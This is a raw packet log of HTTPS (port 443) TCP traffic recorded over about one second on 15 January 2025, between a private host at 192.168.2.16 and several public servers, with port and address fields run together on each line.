                                                                                                                                            Jan 15, 2025 19:14:42.661042929 CET49911443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.661067963 CET44349911104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.673101902 CET44349908104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.673295975 CET44349908104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.673352957 CET49908443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:42.674042940 CET49908443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:42.674074888 CET44349908104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.689248085 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.689532042 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.689577103 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.689939976 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690001965 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690042973 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690056086 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.690084934 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690115929 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690126896 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690134048 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.690140963 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690177917 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.690197945 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690201998 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.690212965 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.690253973 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.690659046 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.691128016 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.691204071 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.692099094 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.692188978 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.692471027 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.692487955 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.692759991 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.692851067 CET44349909104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.692923069 CET44349909104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.693101883 CET49909443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:42.693690062 CET49909443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:42.693701982 CET44349909104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.694747925 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.694808006 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.694835901 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.694843054 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.694886923 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.694931030 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.703377962 CET49907443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:42.703413010 CET44349907104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.715287924 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.715327024 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.715375900 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.715403080 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.715418100 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.715451002 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.716156960 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.716173887 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.716233015 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.716242075 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.716284990 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.716948032 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.717011929 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.717020035 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.717032909 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.717087030 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.717236996 CET49906443192.168.2.16151.101.2.137
                                                                                                                                            Jan 15, 2025 19:14:42.717252016 CET44349906151.101.2.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.735375881 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.735414982 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.735420942 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.736984015 CET44349907104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.737082005 CET49907443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:42.737350941 CET49907443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:42.737377882 CET44349907104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.769563913 CET44349914104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.773484945 CET44349914104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.773583889 CET49914443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.773701906 CET49914443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.773731947 CET44349914104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.778350115 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.778433084 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.778479099 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.778518915 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.778527021 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.778572083 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.778589964 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.778947115 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779052019 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779098988 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779118061 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.779126883 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779150009 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.779408932 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779453993 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779473066 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.779479980 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779524088 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779567003 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.779573917 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.779614925 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.780044079 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780124903 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780210972 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780250072 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780277967 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.780284882 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780327082 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780328035 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.780343056 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780348063 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.780358076 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780402899 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.780409098 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780752897 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.780816078 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.781125069 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.781166077 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.781182051 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.781191111 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.781275034 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.781318903 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.781456947 CET49913443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.781471968 CET44349913104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.781507969 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.781559944 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.783996105 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.784066916 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.784224033 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.784233093 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.806441069 CET44349910104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.806699991 CET44349910104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.806768894 CET49910443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.807185888 CET49910443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.807212114 CET44349910104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.831387997 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.841249943 CET44349912104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.841401100 CET44349912104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.841615915 CET49912443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.842402935 CET49912443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:42.842426062 CET44349912104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.857369900 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.857532978 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.857702017 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.857877970 CET49917443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:14:42.857901096 CET4434991735.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.892995119 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.893093109 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.893480062 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.893762112 CET49916443192.168.2.1634.107.199.61
                                                                                                                                            Jan 15, 2025 19:14:42.893778086 CET4434991634.107.199.61192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.000601053 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.000864029 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.000897884 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.002418041 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.002490997 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.002835035 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.002937078 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.002974033 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.014121056 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.014401913 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.014450073 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.015917063 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.016014099 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.016412973 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.016505003 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.016582966 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.047338009 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.055341959 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.055372000 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.063344002 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.071373940 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.071420908 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.103357077 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.117611885 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.129045010 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129331112 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129373074 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129395008 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.129417896 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129455090 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.129463911 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129519939 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129565001 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.129570961 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129605055 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129640102 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.129645109 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129694939 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.129734039 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.129740953 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.157608986 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.157875061 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.157939911 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.157962084 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.157990932 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.158041954 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.158098936 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.158251047 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.158334970 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.158390999 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.158409119 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.158452988 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.158462048 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.162242889 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.162322044 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.162334919 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.183366060 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.183389902 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.188172102 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.188273907 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.188659906 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.188961029 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.188992023 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.214402914 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.219871044 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.219914913 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.219947100 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.219978094 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220076084 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.220083952 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220134020 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220174074 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.220180988 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220727921 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220767021 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220774889 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.220781088 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220832109 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220877886 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.220884085 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.220941067 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.221565962 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.221631050 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.221669912 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.221673012 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.221682072 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.221883059 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.221889019 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.222527027 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.222577095 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.222580910 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.222593069 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.222629070 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.222634077 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.222677946 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.222969055 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.222974062 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.224664927 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.224739075 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.224745035 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.224764109 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.224808931 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.224934101 CET49918443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.224951029 CET44349918104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.245893002 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.245980978 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246020079 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246031046 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.246076107 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246135950 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246179104 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.246190071 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246445894 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.246830940 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246901035 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246944904 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.246988058 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.246995926 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.247037888 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.247039080 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.247092962 CET49919443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.247102022 CET44349919104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.253062963 CET49921443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.253096104 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.253161907 CET49921443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.253755093 CET49921443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.253766060 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.642644882 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.642975092 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.643033028 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.643444061 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.643874884 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.643965960 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.644007921 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.687357903 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.692414999 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.708844900 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.709218979 CET49921443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.709238052 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.709678888 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.710241079 CET49921443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.710330963 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.710480928 CET49921443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.755331039 CET44349921104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.786933899 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787004948 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787035942 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787070990 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787092924 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.787101984 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787138939 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787169933 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.787193060 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787214994 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.787230968 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787278891 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.787281036 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787292957 CET44349920104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:43.787350893 CET49920443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:43.787367105 CET44349920104.18.95.41192.168.2.16
